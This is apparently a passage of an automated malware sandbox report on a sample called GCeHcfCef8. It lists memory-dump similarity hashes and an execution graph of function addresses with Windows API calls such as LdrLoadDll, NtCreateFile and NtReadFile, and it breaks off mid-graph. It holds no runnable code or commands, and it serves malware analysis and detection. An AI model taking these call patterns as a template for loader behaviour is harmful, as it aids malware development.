                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1342743997.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_16ed000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2edf5c12952a2e3d6f381b9bef0ed6f575a1e3523f7bcac04069fe7e42078434
                                                                                                  • Instruction ID: dc5579fdd4f563647674b6653c5f1e0ebf61182b8032c107b2351591b753a0e9
                                                                                                  • Opcode Fuzzy Hash: 2edf5c12952a2e3d6f381b9bef0ed6f575a1e3523f7bcac04069fe7e42078434
                                                                                                  • Instruction Fuzzy Hash: 6E212271604200DFCB15DF58D988B26BFA5FB88314F28C66DE80A0B396C33AD407CA61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1342743997.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_16ed000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d54da019be3449e934b0b12b352cf7587e7a7301ddfe980ad652f083b26fe7f5
                                                                                                  • Instruction ID: 20168934ad6456df5753e7e31cd9f99fecaa9fa3cdd13404ed8690ab4662e325
                                                                                                  • Opcode Fuzzy Hash: d54da019be3449e934b0b12b352cf7587e7a7301ddfe980ad652f083b26fe7f5
                                                                                                  • Instruction Fuzzy Hash: 73212675504204EFDB05DF98DDC8B26BBE5FB88324F20C6ADEA094B396C336D406CA61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1342743997.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_16ed000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9ca17013b519b379c2af3a0f419437b58e21bc1c74f9a0b85067500e9f69e3e8
                                                                                                  • Instruction ID: ffb43d9547a73cd1252c8e9a3632fa9eee94ce61df9ace1b92bb60128d866f8e
                                                                                                  • Opcode Fuzzy Hash: 9ca17013b519b379c2af3a0f419437b58e21bc1c74f9a0b85067500e9f69e3e8
                                                                                                  • Instruction Fuzzy Hash: A22192755093808FDB03CF24D994715BFB1FB46214F29C6DAD8498F2A7C33A980ACB62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1342664172.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_16dd000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                                  • Instruction ID: ec10cdc6dbd04dec4816595e99198aedfaacbd83dca9bd3d0aff8e45a0d60654
                                                                                                  • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                                  • Instruction Fuzzy Hash: 0211DF72804240DFDB12DF44D9C4B56BF71FB84324F24C2A9D9090B296C33AE45ACBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1342743997.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_16ed000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                                                                  • Instruction ID: 9114097738cddd85d7db37cdae291eab271c81c4ed76e96536cf8567a68c5ee0
                                                                                                  • Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                                                                  • Instruction Fuzzy Hash: 6D11BB75504280DFDB02CF54C9C8B15BBA1FB84224F24C6A9D9494B396C33AD40ACB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1342664172.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_16dd000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 478d3d65b5ac410a7f8b171c3ba6da8bad0633ebb0656aa318c449b4c2c4926c
                                                                                                  • Instruction ID: 1c63d1c1b848bf9191a1fcee7dde4d7e0b2ddde2c4358d91b3ac50cdf41e7c20
                                                                                                  • Opcode Fuzzy Hash: 478d3d65b5ac410a7f8b171c3ba6da8bad0633ebb0656aa318c449b4c2c4926c
                                                                                                  • Instruction Fuzzy Hash: 15012B71904384AAE720AF59CD84F77BF98DF41320F19C5AAED0D0A2CAD379D801C6B1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1342664172.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_16dd000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3a9cafe8b6f7903896dfec0e6c656ebc482d8e0cd8ae7dea65ee21330d7cfbea
                                                                                                  • Instruction ID: 48d792ca4043698d15e88df030b3fd62bfaf69a0dd050665567a4179b8f91536
                                                                                                  • Opcode Fuzzy Hash: 3a9cafe8b6f7903896dfec0e6c656ebc482d8e0cd8ae7dea65ee21330d7cfbea
                                                                                                  • Instruction Fuzzy Hash: 5AF06271404384AEE7219E1ACC88B76FF98EF51634F19C45AED0C5A2CAC3799844CAB1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3bad14d70588a0cf430b31e71d03213a1e04b082e6d2630350709341dc6cde71
                                                                                                  • Instruction ID: cebb6ba26c62a3278a542db284434a1de11401ead869ba1c1ed6b9e06890981c
                                                                                                  • Opcode Fuzzy Hash: 3bad14d70588a0cf430b31e71d03213a1e04b082e6d2630350709341dc6cde71
                                                                                                  • Instruction Fuzzy Hash: 08D19B72B007058FDB29DB79C890BAEB7F6AF89B00F24446DD14ADB690CB75D902CB51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1347591301.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5690000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9e7c87916a022cf0f18d8997b44c0e77544ba7a2bc75ce5b07c78e41155bf6c1
                                                                                                  • Instruction ID: 8dfab8fe66388a3d9cd2e71cfe21d8f508ce7fea44a0139bc114097534f9a94a
                                                                                                  • Opcode Fuzzy Hash: 9e7c87916a022cf0f18d8997b44c0e77544ba7a2bc75ce5b07c78e41155bf6c1
                                                                                                  • Instruction Fuzzy Hash: FA12A7F2C8976D8BD710CF65E94C189BBB1BB453A8BD04A09D3622F2E1D7B4116ACF44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 93510acfa3bbd2c4e5369ed612efea5142cf49a28c3f351aabfae4b447d2fabe
                                                                                                  • Instruction ID: 640a180a20e4e2f5fb8597ee2540391f4ff4a26137753add49260d3fe982d395
                                                                                                  • Opcode Fuzzy Hash: 93510acfa3bbd2c4e5369ed612efea5142cf49a28c3f351aabfae4b447d2fabe
                                                                                                  • Instruction Fuzzy Hash: D1D1E835C20B5A8ACB10EBA5D9506DDB7B1FFD5340F21CB9AD10937224EB706AC9CB51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1343068086.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_18d0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2887aadb52976c5af452b6a5cc745d402b0610785b47900c5a8f4d3fd746b236
                                                                                                  • Instruction ID: 6347960c831fcf6ba72dda8cea9a7d6d988ce7aba8f741f9b61c2ce07bfec9a3
                                                                                                  • Opcode Fuzzy Hash: 2887aadb52976c5af452b6a5cc745d402b0610785b47900c5a8f4d3fd746b236
                                                                                                  • Instruction Fuzzy Hash: CAA19232E0071A9FCF06DFB8C84459EB7B2FF85300B158569EA02EB265DB31DA16DB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0ac1d03800957b24852bb81a2f17519e11fe33888add99d1b7abe057fa1289e5
                                                                                                  • Instruction ID: 837151eabeb7bbb11cb9634c77887dcc570690550f51ac20716048a7820b12de
                                                                                                  • Opcode Fuzzy Hash: 0ac1d03800957b24852bb81a2f17519e11fe33888add99d1b7abe057fa1289e5
                                                                                                  • Instruction Fuzzy Hash: B9D1D735C20B5A8ACB10EBA5D95069DB7B1FFD5340F21CB9AD10937264EB706AC8CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1347591301.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5690000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 378c0d258d322cecded6e7efc6f0fccd467ba50d29f529e994dcf0af2d9257ef
                                                                                                  • Instruction ID: f51c5e50625d87963bfe430cb37068122d74958f170aa918ee9dd9efad425f0d
                                                                                                  • Opcode Fuzzy Hash: 378c0d258d322cecded6e7efc6f0fccd467ba50d29f529e994dcf0af2d9257ef
                                                                                                  • Instruction Fuzzy Hash: 6DC13EB1C8476D8BD711CF74E84C189BBB1BB85394F914A09D3626F2E1DBB424AACF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4b49b2888513a5720dfd70f3f89f800f8ac441b691d6d48c78d4a668b6501f95
                                                                                                  • Instruction ID: f3f6e6acfe2bbe5a809c52d7b6d0bb26d829f24bfd43832d027ae1ed35aae333
                                                                                                  • Opcode Fuzzy Hash: 4b49b2888513a5720dfd70f3f89f800f8ac441b691d6d48c78d4a668b6501f95
                                                                                                  • Instruction Fuzzy Hash: 9681F272D05209DFCF18CFE5D5809AEFBB2EF89750F24942AD419AB364D774AA42CB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c2303d232afd8f2069097481e606edc87012b7bc61160c475735cba419c6be10
                                                                                                  • Instruction ID: d30d3a8646381129fd12dcf07ba82339bca998fd3be4f4e8c8a5c14030a68330
                                                                                                  • Opcode Fuzzy Hash: c2303d232afd8f2069097481e606edc87012b7bc61160c475735cba419c6be10
                                                                                                  • Instruction Fuzzy Hash: C5811472D05209DFCF18CFE5D5809AEFBB2EF89710F24982AD419AB354D774AA42CB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c836c644bfd8d049d66e10c73e92235c2b3bfb0e18531cb24f04f8cb030c1460
                                                                                                  • Instruction ID: 7777c5fb75f9b46b39e1235844ef6d12ffe047731103bb4df885cf9e9e4c2309
                                                                                                  • Opcode Fuzzy Hash: c836c644bfd8d049d66e10c73e92235c2b3bfb0e18531cb24f04f8cb030c1460
                                                                                                  • Instruction Fuzzy Hash: 32215170D166848FD70ACFBAC95169DBFF2AFC6200F18C4ABC448EB266DB345906CB51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5dc91add78b190dff8fde5f3733668198a589b77de8715b53768a184756eb97a
                                                                                                  • Instruction ID: 8bc7b13de4325c1d892d2f7801f098f3f059f95073d4c9dc685eeeb36d04a8cf
                                                                                                  • Opcode Fuzzy Hash: 5dc91add78b190dff8fde5f3733668198a589b77de8715b53768a184756eb97a
                                                                                                  • Instruction Fuzzy Hash: 56112C71E116198BDB48CFAAD9406DEFBF7EBC8310F14C07AD408A7214EB305A418B50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.4%
                                                                                                  Dynamic/Decrypted Code Coverage:2.7%
                                                                                                  Signature Coverage:5.7%
                                                                                                  Total number of Nodes:557
                                                                                                  Total number of Limit Nodes:73
                                                                                                  execution_graph 96739 41f1a0 96742 41b970 96739->96742 96743 41b996 96742->96743 96750 409d40 96743->96750 96745 41b9a2 96746 41b9c3 96745->96746 96758 40c1c0 96745->96758 96748 41b9b5 96794 41a6b0 96748->96794 96800 409c90 96750->96800 96752 409d4d 96753 409d54 96752->96753 96812 409c30 96752->96812 96753->96745 96759 40c1e5 96758->96759 97228 40b1c0 96759->97228 96761 40c23c 97232 40ae40 96761->97232 96763 40c4b3 96763->96748 96764 40c262 96764->96763 97241 4143a0 96764->97241 96766 40c2a7 96766->96763 97244 408a60 96766->97244 96768 40c2eb 96768->96763 97251 41a500 96768->97251 96772 40c341 96773 40c348 96772->96773 97263 41a010 96772->97263 96774 41bdc0 2 API calls 96773->96774 96776 40c355 96774->96776 96776->96748 96778 40c392 96779 41bdc0 2 API calls 96778->96779 96780 40c399 96779->96780 96780->96748 96781 40c3a2 96782 40f4a0 3 API calls 96781->96782 96783 40c416 96782->96783 96783->96773 96784 40c421 96783->96784 96785 41bdc0 2 API calls 96784->96785 96786 40c445 96785->96786 97268 41a060 96786->97268 96789 41a010 2 API calls 96790 40c480 96789->96790 96790->96763 97273 419e20 96790->97273 96793 41a6b0 2 API calls 96793->96763 96795 41a6cf ExitProcess 96794->96795 96796 41af60 LdrLoadDll 96794->96796 96797 41a6e0 96795->96797 96796->96795 96798 41a6ff 96797->96798 96799 41af60 LdrLoadDll 96797->96799 96798->96746 96799->96798 96801 409ca3 96800->96801 96851 418bc0 LdrLoadDll 96800->96851 96831 418a70 96801->96831 96804 409cb6 96804->96752 96805 409cac 96805->96804 96834 41b2b0 96805->96834 96807 409cf3 96807->96804 96845 409ab0 96807->96845 96809 409d13 96852 409620 LdrLoadDll 96809->96852 96811 409d25 96811->96752 96813 409c4a 96812->96813 96814 41b5a0 LdrLoadDll 96812->96814 97203 41b5a0 96813->97203 96814->96813 96817 41b5a0 LdrLoadDll 96818 409c71 96817->96818 96819 40f180 96818->96819 96820 40f199 96819->96820 97211 40b040 96820->97211 96822 40f1ac 97215 41a1e0 96822->97215 96826 40f1d2 96827 40f1fd 96826->96827 97221 41a260 96826->97221 96828 41a490 2 API calls 96827->96828 96830 409d65 96828->96830 96830->96745 96853 41a600 96831->96853 96835 41b2c9 96834->96835 96866 414a50 96835->96866 96837 41b2e1 96838 41b2ea 96837->96838 96905 41b0f0 96837->96905 96838->96807 96840 41b2fe 96840->96838 96923 419f00 96840->96923 96848 409aca 96845->96848 97181 407ea0 96845->97181 96847 409ad1 96847->96809 96848->96847 97194 408160 96848->97194 96851->96801 96852->96811 96854 418a85 96853->96854 96856 41af60 96853->96856 96854->96805 96857 41af70 96856->96857 96859 41af92 96856->96859 96860 414e50 96857->96860 96859->96854 96861 414e5e 96860->96861 96863 414e6a 96860->96863 96861->96863 96865 4152d0 LdrLoadDll 96861->96865 96863->96859 96864 414fbc 96864->96859 96865->96864 96867 414d85 96866->96867 96877 414a64 96866->96877 96867->96837 96870 414b7d 96870->96837 96871 414b90 96934 41a360 96871->96934 96872 414b73 96991 41a460 LdrLoadDll 96872->96991 96875 414bb7 96876 41bdc0 2 API calls 96875->96876 96879 414bc3 96876->96879 96877->96867 96931 419c50 96877->96931 96878 414d49 96881 41a490 2 API calls 96878->96881 96879->96870 96879->96878 96880 414d5f 96879->96880 96885 414c52 96879->96885 97000 414790 LdrLoadDll NtReadFile NtClose 96880->97000 96882 414d50 96881->96882 96882->96837 96884 414d72 96884->96837 96886 414cb9 96885->96886 96888 414c61 96885->96888 96886->96878 96887 414ccc 96886->96887 96993 41a2e0 96887->96993 96890 414c66 96888->96890 96891 414c7a 96888->96891 96992 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 96890->96992 96894 414c97 96891->96894 96895 414c7f 96891->96895 96894->96882 96949 414410 96894->96949 96937 4146f0 96895->96937 96897 414c70 96897->96837 96899 414d2c 96997 41a490 96899->96997 96900 414c8d 96900->96837 96903 414caf 96903->96837 96904 414d38 96904->96837 96906 41b101 96905->96906 96907 41b113 96906->96907 97018 41bd40 96906->97018 96907->96840 96909 41b134 97021 414070 96909->97021 96911 41b180 96911->96840 96912 41b157 96912->96911 96913 414070 3 API calls 96912->96913 96915 41b179 96913->96915 96915->96911 97053 415390 96915->97053 96916 41b20a 96917 41b21a 96916->96917 97147 41af00 LdrLoadDll 96916->97147 97063 41ad70 96917->97063 96920 41b248 97142 419ec0 96920->97142 96924 419f1c 96923->96924 96925 41af60 LdrLoadDll 96923->96925 97175 1722c0a 96924->97175 96925->96924 96926 419f37 96928 41bdc0 96926->96928 97178 41a670 96928->97178 96930 41b359 96930->96807 96932 414b44 96931->96932 96933 41af60 LdrLoadDll 96931->96933 96932->96870 96932->96871 96932->96872 96933->96932 96935 41af60 LdrLoadDll 96934->96935 96936 41a37c NtCreateFile 96935->96936 96936->96875 96938 41470c 96937->96938 96939 41a2e0 LdrLoadDll 96938->96939 96940 41472d 96939->96940 96941 414734 96940->96941 96942 414748 96940->96942 96943 41a490 2 API calls 96941->96943 96944 41a490 2 API calls 96942->96944 96945 41473d 96943->96945 96946 414751 96944->96946 96945->96900 97001 41bfd0 LdrLoadDll RtlAllocateHeap 96946->97001 96948 41475c 96948->96900 96950 41445b 96949->96950 96951 41448e 96949->96951 96952 41a2e0 LdrLoadDll 96950->96952 96953 4145d9 96951->96953 96957 4144aa 96951->96957 96954 414476 96952->96954 96955 41a2e0 LdrLoadDll 96953->96955 96956 41a490 2 API calls 96954->96956 96961 4145f4 96955->96961 96958 41447f 96956->96958 96959 41a2e0 LdrLoadDll 96957->96959 96958->96903 96960 4144c5 96959->96960 96963 4144e1 96960->96963 96964 4144cc 96960->96964 97014 41a320 LdrLoadDll 96961->97014 96967 4144e6 96963->96967 96968 4144fc 96963->96968 96966 41a490 2 API calls 96964->96966 96965 41462e 96969 41a490 2 API calls 96965->96969 96970 4144d5 96966->96970 96971 41a490 2 API calls 96967->96971 96977 414501 96968->96977 97002 41bf90 96968->97002 96974 414639 96969->96974 96970->96903 96972 4144ef 96971->96972 96972->96903 96973 414513 96973->96903 96974->96903 96977->96973 97005 41a410 96977->97005 96978 414567 96982 41457e 96978->96982 97013 41a2a0 LdrLoadDll 96978->97013 96979 414585 96983 41a490 2 API calls 96979->96983 96980 41459a 96984 41a490 2 API calls 96980->96984 96982->96979 96982->96980 96983->96973 96985 4145a3 96984->96985 96986 4145cf 96985->96986 97008 41bb90 96985->97008 96986->96903 96988 4145ba 96989 41bdc0 2 API calls 96988->96989 96990 4145c3 96989->96990 96990->96903 96991->96870 96992->96897 96994 414d14 96993->96994 96995 41af60 LdrLoadDll 96993->96995 96996 41a320 LdrLoadDll 96994->96996 96995->96994 96996->96899 96998 41a4ac NtClose 96997->96998 96999 41af60 LdrLoadDll 96997->96999 96998->96904 96999->96998 97000->96884 97001->96948 97004 41bfa8 97002->97004 97015 41a630 97002->97015 97004->96977 97006 41a42c NtReadFile 97005->97006 97007 41af60 LdrLoadDll 97005->97007 97006->96978 97007->97006 97009 41bbb4 97008->97009 97010 41bb9d 97008->97010 97009->96988 97010->97009 97011 41bf90 2 API calls 97010->97011 97012 41bbcb 97011->97012 97012->96988 97013->96982 97014->96965 97016 41af60 LdrLoadDll 97015->97016 97017 41a64c RtlAllocateHeap 97016->97017 97017->97004 97148 41a540 97018->97148 97020 41bd6d 97020->96909 97022 414081 97021->97022 97023 414089 97021->97023 97022->96912 97052 41435c 97023->97052 97151 41cf30 97023->97151 97025 4140dd 97026 41cf30 2 API calls 97025->97026 97030 4140e8 97026->97030 97027 414136 97029 41cf30 2 API calls 97027->97029 97033 41414a 97029->97033 97030->97027 97031 41d060 3 API calls 97030->97031 97162 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 97030->97162 97031->97030 97032 4141a7 97034 41cf30 2 API calls 97032->97034 97033->97032 97156 41d060 97033->97156 97036 4141bd 97034->97036 97037 4141fa 97036->97037 97039 41d060 3 API calls 97036->97039 97038 41cf30 2 API calls 97037->97038 97040 414205 97038->97040 97039->97036 97041 41d060 3 API calls 97040->97041 97047 41423f 97040->97047 97041->97040 97043 414334 97164 41cf90 LdrLoadDll RtlFreeHeap 97043->97164 97045 41433e 97165 41cf90 LdrLoadDll RtlFreeHeap 97045->97165 97163 41cf90 LdrLoadDll RtlFreeHeap 97047->97163 97048 414348 97166 41cf90 LdrLoadDll RtlFreeHeap 97048->97166 97050 414352 97167 41cf90 LdrLoadDll RtlFreeHeap 97050->97167 97052->96912 97054 4153a1 97053->97054 97055 414a50 8 API calls 97054->97055 97057 4153b7 97055->97057 97056 41540a 97056->96916 97057->97056 97058 4153f2 97057->97058 97059 415405 97057->97059 97060 41bdc0 2 API calls 97058->97060 97061 41bdc0 2 API calls 97059->97061 97062 4153f7 97060->97062 97061->97056 97062->96916 97064 41ad84 97063->97064 97065 41ac30 LdrLoadDll 97063->97065 97168 41ac30 97064->97168 97065->97064 97068 41ac30 LdrLoadDll 97069 41ad96 97068->97069 97070 41ac30 LdrLoadDll 97069->97070 97071 41ad9f 97070->97071 97072 41ac30 LdrLoadDll 97071->97072 97073 41ada8 97072->97073 97074 41ac30 LdrLoadDll 97073->97074 97075 41adb1 97074->97075 97076 41ac30 LdrLoadDll 97075->97076 97077 41adbd 97076->97077 97078 41ac30 LdrLoadDll 97077->97078 97079 41adc6 97078->97079 97080 41ac30 LdrLoadDll 97079->97080 97081 41adcf 97080->97081 97082 41ac30 LdrLoadDll 97081->97082 97083 41add8 97082->97083 97084 41ac30 LdrLoadDll 97083->97084 97085 41ade1 97084->97085 97086 41ac30 LdrLoadDll 97085->97086 97087 41adea 97086->97087 97088 41ac30 LdrLoadDll 97087->97088 97089 41adf6 97088->97089 97090 41ac30 LdrLoadDll 97089->97090 97091 41adff 97090->97091 97092 41ac30 LdrLoadDll 97091->97092 97093 41ae08 97092->97093 97094 41ac30 LdrLoadDll 97093->97094 97095 41ae11 97094->97095 97096 41ac30 LdrLoadDll 97095->97096 97097 41ae1a 97096->97097 97098 41ac30 LdrLoadDll 97097->97098 97099 41ae23 97098->97099 97100 41ac30 LdrLoadDll 97099->97100 97101 41ae2f 97100->97101 97102 41ac30 LdrLoadDll 97101->97102 97103 41ae38 97102->97103 97104 41ac30 LdrLoadDll 97103->97104 97105 41ae41 97104->97105 97106 41ac30 LdrLoadDll 97105->97106 97107 41ae4a 97106->97107 97108 41ac30 LdrLoadDll 97107->97108 97109 41ae53 97108->97109 97110 41ac30 LdrLoadDll 97109->97110 97111 41ae5c 97110->97111 97112 41ac30 LdrLoadDll 97111->97112 97113 41ae68 97112->97113 97114 41ac30 LdrLoadDll 97113->97114 97115 41ae71 97114->97115 97116 41ac30 LdrLoadDll 97115->97116 97117 41ae7a 97116->97117 97118 41ac30 LdrLoadDll 97117->97118 97119 41ae83 97118->97119 97120 41ac30 LdrLoadDll 97119->97120 97121 41ae8c 97120->97121 97122 41ac30 LdrLoadDll 97121->97122 97123 41ae95 97122->97123 97124 41ac30 LdrLoadDll 97123->97124 97125 41aea1 97124->97125 97126 41ac30 LdrLoadDll 97125->97126 97127 41aeaa 97126->97127 97128 41ac30 LdrLoadDll 97127->97128 97129 41aeb3 97128->97129 97130 41ac30 LdrLoadDll 97129->97130 97131 41aebc 97130->97131 97132 41ac30 LdrLoadDll 97131->97132 97133 41aec5 97132->97133 97134 41ac30 LdrLoadDll 97133->97134 97135 41aece 97134->97135 97136 41ac30 LdrLoadDll 97135->97136 97137 41aeda 97136->97137 97138 41ac30 LdrLoadDll 97137->97138 97139 41aee3 97138->97139 97140 41ac30 LdrLoadDll 97139->97140 97141 41aeec 97140->97141 97141->96920 97143 41af60 LdrLoadDll 97142->97143 97144 419edc 97143->97144 97174 1722df0 LdrInitializeThunk 97144->97174 97145 419ef3 97145->96840 97147->96917 97149 41af60 LdrLoadDll 97148->97149 97150 41a55c NtAllocateVirtualMemory 97149->97150 97150->97020 97152 41cf40 97151->97152 97153 41cf46 97151->97153 97152->97025 97154 41bf90 2 API calls 97153->97154 97155 41cf6c 97154->97155 97155->97025 97157 41cfd0 97156->97157 97158 41bf90 2 API calls 97157->97158 97159 41d02d 97157->97159 97160 41d00a 97158->97160 97159->97033 97161 41bdc0 2 API calls 97160->97161 97161->97159 97162->97030 97163->97043 97164->97045 97165->97048 97166->97050 97167->97052 97169 41ac4b 97168->97169 97170 414e50 LdrLoadDll 97169->97170 97171 41ac6b 97170->97171 97172 414e50 LdrLoadDll 97171->97172 97173 41ad17 97171->97173 97172->97173 97173->97068 97174->97145 97176 1722c11 97175->97176 97177 1722c1f LdrInitializeThunk 97175->97177 97176->96926 97177->96926 97179 